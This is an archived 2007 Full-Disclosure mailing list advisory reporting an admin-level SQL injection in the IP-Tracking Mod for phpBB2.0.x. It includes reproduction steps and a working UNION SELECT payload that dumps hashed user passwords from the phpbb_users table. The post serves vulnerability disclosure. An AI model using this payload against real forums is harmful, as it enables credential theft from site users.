full-disclosure-uk May 2007 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] SQL-Injection in IP-TRACKI

[Full-disclosure] SQL-Injection in IP-TRACKING Mod for phpBB2.0.x

From: Cornelius Riemenschneider <c.r1_at_nospam>
Date: Sun May 20 2007 - 17:48:06 GMT
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk


Information: The IP-Tracking Mod is a Extension for phpBB2.0.x which logs all Page hits the user of the Boards do including Referer, IP and Username. It contains a SQL-Injection on Admin-Level. You can get it from:
http://www.phpbb.de/viewtopic.php?t=63690&postdays=0&postorder=asc&start=0

Steps to reproduce: Go into your ACP, select under IP-Tracking IP-Search, select "no" at use wildcards and enter in Search Query what you want. It is direct passed through the Query. As Search Type I used IP.

PoC: enter
' UNION SELECT user_password as
ip,user_id,username,user_active,user_regdate,user_level,user_posts from phpbb_users#
as Search-Query. This will display you all the hashed Userpasswords in IP



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/